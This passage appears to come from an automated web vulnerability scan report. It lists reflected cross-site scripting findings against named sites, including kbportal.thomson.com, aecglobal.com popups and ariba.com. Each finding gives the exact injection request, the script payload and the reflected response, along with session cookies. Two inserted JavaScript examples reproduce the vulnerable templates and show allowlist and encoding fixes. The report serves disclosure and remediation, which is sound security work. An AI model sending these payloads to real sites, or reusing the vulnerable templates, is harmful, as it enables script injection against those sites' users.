Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2083


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>West Research A
...[SNIP]...
<input type="hidden" name="searchtype" value="e1aa7"><script>alert(1)</script>d1bc6a57430">
...[SNIP]...

1.31. http://kbportal.thomson.com/display/2/loginSecure.aspx [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecure.aspx

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e659"><script>alert(1)</script>5f977f7c25f was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecure.aspx?cpid=24&t=7e659"><script>alert(1)</script>5f977f7c25f&aid=&searchstring=&searchtype=&searchby=&cat=&catURL= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://kbportal.thomson.com/display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: kbportal.thomson.com
Proxy-Connection: Keep-Alive
Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2083


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>West Research A
...[SNIP]...
<input type="hidden" name="t" value="7e659"><script>alert(1)</script>5f977f7c25f">
...[SNIP]...

1.32. http://kbportal.thomson.com/display/2/loginSecureFrame.aspx [cpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecureFrame.aspx

Issue detail

The value of the cpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53c85"><script>alert(1)</script>1f1e0f96fd9 was submitted in the cpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecureFrame.aspx?cpid=53c85"><script>alert(1)</script>1f1e0f96fd9&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: kbportal.thomson.com
Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 842


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
</hea
...[SNIP]...
<frame name="CPtopFrame" src="top.aspx?cpid=53c85"><script>alert(1)</script>1f1e0f96fd9" marginwidth="0" marginheight="0" frameborder="no" noresize scrolling="no">
...[SNIP]...

1.33. http://kbportal.thomson.com/display/2/loginSecureFrame.aspx [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecureFrame.aspx

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a5d6"><script>alert(1)</script>3b0d47b4214 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=8a5d6"><script>alert(1)</script>3b0d47b4214&aid=&cat=&catURL=&r=0.585381746292114 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: kbportal.thomson.com
Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 762


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
</hea
...[SNIP]...
<frame name="CPindexFrame" src="loginSecure.aspx?cpid=24&t=8a5d6"><script>alert(1)</script>3b0d47b4214&aid=&searchstring=&searchtype=&searchby=&cat=&catURL=" marginwidth="0" marginheight="0" frameborder="no">
...[SNIP]...

1.34. http://unitedsupplierdiversity.aecglobal.com/Popup/NaicsCodePopup.aspx [ParentAddFuntionName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://unitedsupplierdiversity.aecglobal.com
Path:   /Popup/NaicsCodePopup.aspx

Issue detail

The value of the ParentAddFuntionName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 988af%3balert(1)//947510d823b was submitted in the ParentAddFuntionName parameter. This input was echoed as 988af;alert(1)//947510d823b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Popup/NaicsCodePopup.aspx?value=&ParentAddFuntionName=AddNaicsCode988af%3balert(1)//947510d823b&SelectionMethod=IFrame HTTP/1.1
Host: unitedsupplierdiversity.aecglobal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://unitedsupplierdiversity.aecglobal.com/Supplier/Supplier_Registration.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5whsceev351pci55rbtlpk45

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 17:42:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37872


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta content="text/h
...[SNIP]...
<script language="javascript" type="text/javascript">
   function NaicsCodeClick(sID, description, annualSales, totalEmployee)
   {    
    var success = false;
   
   success = parent.AddNaicsCode988af;alert(1)//947510d823b(sID, sID + ': ' + description, annualSales, totalEmployee);
   
       
return success;
   }
   </script>
...[SNIP]...

1.35. http://unitedsupplierdiversity.aecglobal.com/Popup/categorypopup.aspx [ParentAddFuntionName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://unitedsupplierdiversity.aecglobal.com
Path:   /Popup/categorypopup.aspx

Issue detail

The value of the ParentAddFuntionName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 83bbe%3balert(1)//256ca66dcfb was submitted in the ParentAddFuntionName parameter. This input was echoed as 83bbe;alert(1)//256ca66dcfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Popup/categorypopup.aspx?value=&ParentAddFuntionName=_ctl0_content_productservice_categoryListSelector_AddItem_Multiple83bbe%3balert(1)//256ca66dcfb&SelectionMethod=IFrame HTTP/1.1
Host: unitedsupplierdiversity.aecglobal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://unitedsupplierdiversity.aecglobal.com/Supplier/Supplier_Registration.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5whsceev351pci55rbtlpk45

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 17:43:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 527525


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta content="text/h
...[SNIP]...
type="text/javascript">
   function CategoryClick(sID, description, oElement)
   {
       var success = false;
   
   success = parent._ctl0_content_productservice_categoryListSelector_AddItem_Multiple83bbe;alert(1)//256ca66dcfb(sID, description);
   
       
return success;
   }
   </script>
...[SNIP]...

1.36. http://unitedsupplierdiversity.aecglobal.com/Popup/serviceareapopup.aspx [ParentAddFuntionName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://unitedsupplierdiversity.aecglobal.com
Path:   /Popup/serviceareapopup.aspx

Issue detail

The value of the ParentAddFuntionName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b0e2d%3balert(1)//679b28d86ad was submitted in the ParentAddFuntionName parameter. This input was echoed as b0e2d;alert(1)//679b28d86ad in the application's response (the server URL-decodes %3b to ;). As in 1.35, the value becomes the name of a function called on the parent window: the ; terminates the assignment, alert(1) executes as its own statement, and // comments out the remainder of the line.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. This popup shares its construction with categorypopup.aspx (1.35): the parameter only selects a callback on the parent window, so the server should restrict it to an allowlist of known callback names instead of emitting it as script source.
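The following is an added example and is not code from the report, from the scanner or from the scanned application. It models the construction visible in the response excerpts of 1.35 and 1.36 (success = parent.<ParentAddFuntionName>(...)), reproduces the reported reflection from the recorded payload, and shows two hardened forms: an allowlist of the parent callbacks the popup is actually permitted to call, and, where the name cannot be fixed in advance, emitting the value as an escaped JavaScript string literal that is resolved at run time instead of being pasted into source. The function names, the template text and the allowlist contents are assumptions made for illustration; the page's real server-side code is not shown in the report.

```javascript
// Added example: not code from the report or from the scanned application.
// Models how categorypopup.aspx / serviceareapopup.aspx appear to build their
// script block from the ParentAddFuntionName parameter. Function names and
// the allowlist contents below are assumptions made for illustration.

// Payload recorded in finding 1.35, after the server URL-decodes %3b to ';'.
const SCANNER_PAYLOAD =
  "_ctl0_content_productservice_categoryListSelector_AddItem_Multiple83bbe;alert(1)//256ca66dcfb";

// Vulnerable template: the value is spliced into an unquoted JavaScript
// expression, so ';' ends the assignment and '//' comments out the rest.
function renderVulnerable(callbackName) {
  return `success = parent.${callbackName}(sID, description);`;
}

// Hardened form 1: the popup only ever needs a fixed set of parent callbacks,
// so accept nothing outside that set (names here are assumed, not observed).
const ALLOWED_CALLBACKS = new Set([
  "_ctl0_content_productservice_categoryListSelector_AddItem_Multiple",
  "_ctl0_content_companydata_airportListSelector_AddItem_Multiple",
]);

function renderWithAllowlist(callbackName) {
  if (!ALLOWED_CALLBACKS.has(callbackName)) {
    throw new Error("unknown parent callback");
  }
  return `success = parent.${callbackName}(sID, description);`;
}

// Hardened form 2: when the name cannot be fixed in advance, never emit it as
// code. Emit it as a JavaScript string literal with every character that could
// end the literal, the line or the <script> element escaped, and resolve the
// function by name at run time. This closes the injection into source; it
// does not stop the caller choosing any function on parent, which is why
// form 1 is still the better fix.
function jsStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

function renderEncoded(callbackName) {
  return `success = parent[${jsStringLiteral(callbackName)}](sID, description);`;
}

// Check used below: does the emitted line carry the injected statement
// outside a string literal? Strip double-quoted literals, then look for the
// payload's ';alert(1)'. Crude, but sufficient for these one-line templates.
function hasUnquotedInjection(line) {
  const withoutStrings = line.replace(/"(?:\\.|[^"\\])*"/g, '""');
  return /;alert\(1\)/.test(withoutStrings);
}
```

renderVulnerable(SCANNER_PAYLOAD) reproduces the line shown in the 1.35 response excerpt; renderWithAllowlist rejects it outright, and renderEncoded emits it only as the contents of a string literal, so the ; and // no longer reach the parser as code.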

Request

GET /Popup/serviceareapopup.aspx?region=Airport&value=&ParentAddFuntionName=_ctl0_content_companydata_airportListSelector_AddItem_Multipleb0e2d%3balert(1)//679b28d86ad&SelectionMethod=IFrame HTTP/1.1
Host: unitedsupplierdiversity.aecglobal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://unitedsupplierdiversity.aecglobal.com/Supplier/Supplier_Registration.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5whsceev351pci55rbtlpk45

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 17:42:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 163700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta content="text/h
...[SNIP]...
ascript" type="text/javascript">
   function ServiceAreaClick( sID, description)
   {    
       var success = false;
   
   success = parent._ctl0_content_companydata_airportListSelector_AddItem_Multipleb0e2d;alert(1)//679b28d86ad(sID, description);
   
       
return success;
   }
   </script>
...[SNIP]...

1.37. http://www.ariba.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78665"><script>alert(1)</script>41aabb2bdbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The reflection point is the href of the nordics.ariba.com language-selector link, which the page builds by appending the request's raw query string, parameter names included, to the target URL and adding &l=dm. The same construction is visible in the response excerpts of findings 1.38 through 1.48 on www.ariba.com, so one fix, rebuilding that query from percent-encoded parameter names and values and then attribute-encoding the resulting URL, covers the whole group.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?78665"><script>alert(1)</script>41aabb2bdbd=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.ariba.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Fservices%25252Fsupport.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252F%2526ot%253DA; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=620

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:40 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=692;expires=Wed, 17-Oct-2012 18:10:40 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/index.cfm?78665"><script>alert(1)</script>41aabb2bdbd=1&l=dm" title="Denmark">
...[SNIP]...

1.38. http://www.ariba.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 786c8--><script>alert(1)</script>623065440be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The response excerpt below shows the payload inside the double-quoted href of the nordics.ariba.com language link rather than inside a comment; the comment-context reflection reported here is not visible in the excerpt.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. The --> in the payload ends the comment and everything after it is parsed as ordinary markup. Anything that removes the literal > from the data (HTML-encoding it, or percent-encoding the query parameters before they are reused in a URL) prevents the comment from being closed, but the robust fix is not to write request data into comments at all.
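What follows is an added example and is not code from the report, from the scanner or from ariba.com. It reconstructs the link-building pattern visible in the response excerpts of findings 1.37 through 1.48 (the href of the nordics.ariba.com language link is the target host plus the request path plus the raw query string, then &l=dm), reproduces the reported reflections from the recorded payloads, and shows the hardened form: parse the query, percent-encode each name and value, then HTML-attribute-encode the rebuilt URL. The host constant, the function names and the fixed l=dm suffix are assumptions made for illustration; the page's actual server-side code is not shown in the report.

```javascript
// Added example: not code from the report or from ariba.com. Models the
// construction visible in findings 1.37-1.48: a language-switch link whose
// href is the fixed target host plus the request path plus the RAW query
// string, written straight into the attribute. Names are assumptions.

const TARGET_HOST = "http://nordics.ariba.com";

// Vulnerable: the query string (parameter names included) is copied
// byte-for-byte, so '"' closes the href attribute, and '-->' would close an
// HTML comment if the same URL were written into one.
function languageLinkVulnerable(path, rawQuery) {
  const qs = rawQuery ? rawQuery + "&l=dm" : "l=dm";
  return `<a href="${TARGET_HOST}${path}?${qs}" title="Denmark">`;
}

// Decode one query component; a malformed %xx sequence is kept literally
// rather than thrown on, since it is re-encoded below anyway.
function safeDecode(s) {
  try {
    return decodeURIComponent(s.replace(/\+/g, " "));
  } catch (e) {
    return s;
  }
}

// Split the raw query string into decoded [name, value] pairs.
function parseQuery(rawQuery) {
  if (!rawQuery) return [];
  return rawQuery.split("&").filter((p) => p.length > 0).map((pair) => {
    const idx = pair.indexOf("=");
    const name = idx < 0 ? pair : pair.slice(0, idx);
    const value = idx < 0 ? "" : pair.slice(idx + 1);
    return [safeDecode(name), safeDecode(value)];
  });
}

// HTML attribute encoding for the double-quoted href.
function htmlAttr(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Hardened: rebuild the query from percent-encoded names and values, so no
// literal '"', '<' or '>' survives in the URL, then encode the whole URL for
// the attribute context. Two encodings, one per context, applied inside-out.
// The path is assumed to come from the server's own routing, not the request.
function languageLinkHardened(path, rawQuery) {
  const parts = parseQuery(rawQuery).map(
    ([name, value]) => encodeURIComponent(name) + "=" + encodeURIComponent(value)
  );
  parts.push("l=dm");
  const url = TARGET_HOST + path + "?" + parts.join("&");
  return `<a href="${htmlAttr(url)}" title="Denmark">`;
}

// Check used below: does the rendered markup contain an opened script tag or
// a comment terminator, i.e. did the data escape its attribute or comment?
function breaksOut(markup) {
  return markup.includes("<script") || markup.includes("-->");
}
```

With the payload from 1.37, languageLinkVulnerable yields exactly the anchor shown in that response excerpt, while languageLinkHardened turns the quote and angle brackets into %22, %3E and %3C and the separator into &amp;. Because percent-encoding removes every literal > from the components, the same rebuilt URL cannot form --> either, which is what the comment-context findings in this group need; it also handles the case in 1.45 and 1.46 where the parameter name arrives already percent-encoded, since the components are decoded once and re-encoded.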

Request

GET /?786c8--><script>alert(1)</script>623065440be=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.ariba.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=31851666; CFTOKEN=87871625; CAMPID=; s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; s_cc=true; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=ariba-dev%3D%2526pid%253D%25252Fservices%25252Fsupport.cfm%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ariba.com%25252F%2526ot%253DA; LANGUAGEID=en; PARTNER_COOKIE=0; ACTUALLANG=en; WEBSCR=620

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:43 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: LANGUAGEID=;domain=.ariba.com;path=/
Set-Cookie: LANGUAGEID=en;domain=.ariba.com;path=/
Set-Cookie: PARTNER_COOKIE=0;path=/
Set-Cookie: ACTUALLANG=;path=/
Set-Cookie: ACTUALLANG=en;path=/
Set-Cookie: WEBSCR=696;expires=Wed, 17-Oct-2012 18:10:43 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   <title>Spend Management, Invoice Management, Payment
...[SNIP]...
<a href="http://nordics.ariba.com/index.cfm?786c8--><script>alert(1)</script>623065440be=1&l=dm" title="D&#228;nemark">
...[SNIP]...

1.39. http://www.ariba.com/404.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ariba.com
Path:   /404.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 233dc--><script>alert(1)</script>608e4c4a672 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The response excerpt below shows the payload inside the double-quoted href of the nordics.ariba.com language link rather than inside a comment; the comment-context reflection reported here is not visible in the excerpt.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /404.cfm?pageLocation=404&233dc--><script>alert(1)</script>608e4c4a672=1 HTTP/1.1
Host: www.ariba.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
